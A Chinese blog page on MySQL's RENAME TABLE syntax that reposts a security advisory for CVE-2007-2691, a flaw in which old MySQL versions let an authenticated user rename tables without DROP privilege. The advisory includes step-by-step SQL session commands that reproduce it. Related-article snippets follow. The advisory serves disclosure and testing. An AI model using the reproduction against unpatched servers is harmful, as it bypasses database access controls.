mysql rename table报错_mysql rename table相关

最新推荐文章于 2021-05-24 09:56:20 发布
最新推荐文章于 2021-05-24 09:56:20 发布
阅读量407 收藏
点赞数
文章标签: mysql rename table报错
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31865445/article/details/113343149
版权

语法格式:rename table `db`.`table1` to `db`.`table2`;

MySQL Rename Table函数访问验证漏洞

原文出自【比特网】,转载请保留原文链接:http://sec.chinabyte.com/70/11431070.shtml

受影响系统:

MySQL AB MySQL 5.1.x < 5.1.18

MySQL AB MySQL 5.0.x < 5.0.42

MySQL AB MySQL 4.1.x < 4.1.23

不受影响系统:

MySQL AB MySQL 5.1.18

MySQL AB MySQL 5.0.42

MySQL AB MySQL 4.1.23

描述:

BUGTRAQ ID: 24016

CVE(CAN) ID: CVE-2007-2691

MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。

MySQL的Rename Table功能的实现上存在访问验证漏洞,能够以合法帐号登录到攻击者可能利用此漏洞执行非授权的操作。

MySQL没有对RENAME TABLE语句要求DROP权限,这允许通过认证的远程用户重新命名任意表格。

*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

1. 创建一个测试数据库及一个拥有SELECT、INSERT、ALTER和CREATE权限的用户:

mysql> create database priv_test;

Query OK, 1 row affected (0.00 sec)

mysql> grant select, insert, alter, create on `priv\_test`.* to usb@'localhost'

identified by 'mysql';

Query OK, 0 rows affected (0.02 sec)

2. 以该用户的身份连接:

$ ./bin/mysql -uusb -pmysql priv_test

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 2

Server version: 5.1.17-beta-debug Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select current_user();

+----------------+

| current_user() |

+----------------+

+----------------+

1 row in set (0.00 sec)

mysql> create table tabc (col1 int);

Query OK, 0 rows affected (0.02 sec)

mysql> create table tabd (col2 int);

Query OK, 0 rows affected (0.05 sec)

mysql> rename table tabc to tabc_bk,tabd to tabc,tabc_bk to tabd;

Query OK, 0 rows affected (0.00 sec)

可见即使用户没有DROP权限也可以重命名表格。

建议:

厂商补丁:

MySQL AB

--------

厂商发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

温情主义者
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL重命名表(RENAME TABLE语句)
chuoyuetang3940的博客
09-27 4211
在本教程中,您将学习如何使用MySQLRENAMETABLE语句和ALTERTABLE语句来重命名表。 MySQL RENAME TABLE语句简介 由于业务需求的变化,我们需要将当前表重命名为一个新的名称,以更好地反映新的情况。MySQL提供了用于修改一个或多个表的名称的非常有用...
mysql rename语法错误_MySQLrename导致的外键问题
weixin_36023192的博客
02-07 770
背景:由于zabbix监控的问题图形展示很慢,对zabbix 库的events表进行了清理,清理过程采用了原表rename成bak表,重建events表后,将备份表部分数据导入到新表中。后发现zabbix平台无法报警,无法恢复报警,日志类似报错:2315:20190301:104933.609 [Z3005] query failed: [1452] Cannot add or update a ...
mysqlrename table语句
04-24 628
<br />mysql 命令重命名表RENAME TABLE 句法<br />RENAME TABLE tbl_name TO new_tbl_name[, tbl_name2 TO <br />new_tbl_name2,...]<br />更名是以原子方式(atomically)执行,这就意味着,当更名正在运行时,其它的任何线程均不能该表。这使得以一个空表替换一个表成为可能。<br />CREATE TABLE new_table (...);<br />RENAME TABLE old_table T
mysql rename table_MySQL RENAME TABLE
weixin_42407606的博客
01-19 780
MySQL RENAME TABLE简介:在本教程中,您将学习如何使用MySQL RENAME TABLE语句和ALTER TABLE语句重命名表。MySQL RENAME TABLE语句简介由于业务需求发生变化,我们需要将当前表重命名为新表以更好地反映新情况。MySQL为我们提供了一个非常有用的语句,可以更改一个或多个表的名称。要更改一个或多个表,我们使用RENAME TABLE如下语句:REN...
mysql 命令行访问_通过命令行如何远程访问mysql
weixin_34278412的博客
01-18 415
2016-12-28 回答登陆mysql 打cmd命令终端,如果已经添加了mysql的环境变量,可以直接使用命令 mysql -uroot 直接回车,之后按提示输入密码, 如果未添加mysql的环境变量,可以切换到mysql的安装目录下的bin目录,再使用 mysq -uroot 你也可以手动为mysql添加环境变量。这里就不介绍怎么添加环境变量的方法了 密码输入正确之后,就会出现“welcom...
MySQL学习笔记5:修改表(alter table)
01-21
我们在创建表的过程中难免会考虑不周,因此后期会修改表修改表需要用到alter table语句 修改表名 代码如下: mysql> alter table student rename person; Query OK, 0 rows affected (0.03 sec) 这里的student是原名...
MySQL 添加、修改、删除表的列及约束等表的定义
01-19
ALTER TABLE:添加,修改,删除表的列,约束等表... 修改列名MySQL: alter table bbb change nnnnn hh int; 修改列名SQLServer:exec sp_rename’t_student.name’,’nn’,’column’; 修改列名Oracle:lter table bbb
MySQL中修改库名的操作教程
12-15
MySQL在5.1引入了一个rename database操作,但在MySQL5.1.23后又不支持这个命令。可以说是一个实验性的功能,没有在生产中支持过(mysql-5.1 release在mysql-5.1.30),那么生产...mysql>select concat("rename table
清理Mysql general_log的方法总结
01-19
RENAME TABLE mysql.general_log TO mysql.general_log2; DELETE FROM mysql.general_log2; 注意:当DELETE FROM mysql.general_log2执行删除表数据时,发现操作系统的数据文件还是存在的,需要手动删除该数据文件,...
mysql rename table Syntax
cuiding8243的博客
05-13 125
原先想坚持看mysql手册,实在看不下去,犯困。所以嘛,用到的时候就一定去看看。手册能解决很多需要反复试的东西啦。我觉得速度还是很重要的。 今天用到rename table,所以看下这一节。 ...
MySQL rename table方法大全
kunjian的博客
05-24 8923
前言: 有时候我们会遇到重命名表的需求,比如说因业务变化,需要将表 a 重命名为表 b 。这个时候可以执行 RENAME TABLE 语句或 ALTER TABLE 语句来重命名表。本篇文章我们一起来学习下重命名表相关知识。 1.重命名表方法 使用 RENAME TABLE 语句或 ALTER TABLE 语句都可以对表进行重命名,基本语法如下: # RENAME TABLE 语法: RENAME TABLE tbl_name TO new_tbl_name [, tbl_name2 TO
mysql 重命名 失败_重命名MySQL中的列时出错
weixin_39580041的博客
01-19 568
如何重命名表xyz的列? 列是:Manufacurerid, name, status, AI, PK, int我想重命名为manufacturerid我尝试使用PHPMyAdmin面板,但是我收到此错误:MySQL said: Documentation#1025 - Error on rename of '.\shopping\#sql-c98_26' to '.\shopping\tblma...
mysql 5.6 升级问题_mysql5.6升级到mysql5.7
weixin_36348080的博客
01-21 281
一、这个是直接升级,而不是卸载清除低版本重新安装二、重点是系统表升级、升级数据字典[root@localhost /]# /usr/local/mysql/bin/mysql_upgrade -uroot -pEnter password:Checking if update is needed.Checking server version.Running queries to upgrade ...
基于多种编程语言的卡拉音乐播放器设计源码
05-28
本项目是基于多种编程语言的卡拉音乐播放器设计源码,包含625个文件,其中包括389个JavaScript文件、70个TypeScript文件、52个PNG图像文件、22个JSON配置文件、19个Vue文件、12个MAP文件、11个WXSS样式文件、9个WXML模板文件、7个SVG文件和5个EOT字体文件。系统专注于提供卡拉音乐播放器功能,支持歌曲播放、播放列表管理等功能,为用户提供了一个稳定、高效的卡拉音乐播放器。
QTabWidget实现的炫酷标签工具栏+源码
05-28
qt 用法链接:https://menghui666.blog.csdn.net/article/details/139276655?spm=1001.2014.3001.5502 该项目基于QTabWidget和QTabBar实现了灵活的标签工具栏,主要包含如下功能: 1、标签栏可以收起,可以展开 2、可以在标签栏中添加新的标签界面 3、可以从标签工具栏中把界面拖出来,也可以拖回去 4、关闭拖出来的界面会自动回到标签工具栏 5、可以调换标签工具栏中界面的顺序
VB学生公寓管理系统(源代码+论文).rar
05-28
计算机专业毕业设计VB精品论文资源
基于springboot的高校心理教育辅导管理系统
05-28
开发语言:Java JDK版本:JDK1.8(或11) 服务器:tomcat 数据库:mysql 5.6/5.7(或8.0) 数据库工具:Navicat 开发软件:idea 依赖管理包:Maven 代码+数据库保证完整可用,可提供远程调试并指导运行服务(额外付费)~ 如果对系统的中的某些部分感到不合适可提供修改服务,比如题目、界面、功能等等... 声明: 1.项目已经调试过,完美运行 2.需要远程帮忙部署项目,需要额外付费 3.本项目有演示视频,如果需要观看,请联系我v:19306446185 4.调试过程中可帮忙安装IDEA,eclipse,MySQL,JDK,Tomcat等软件 重点: 需要其他Java源码联系我,更多源码任你选,你想要的源码我都有! https://img-blog.csdnimg.cn/direct/e73dc0ac8d27434b86d886db5a438c71.jpeg
debugpy-1.0.0b1-cp34-cp34m-manylinux1_x86_64.whl
最新发布
05-28
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
mysql 命令重命名表RENAME TABLE 句法
05-26
MySQLRENAME TABLE 语句可以用于重命名一个表。它的语法如下: ```sql RENAME TABLE old_table_name TO new_table_name; ``` 其中,`old_table_name` 是要重命名的旧表名,`new_table_name` 是新的表名。注意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值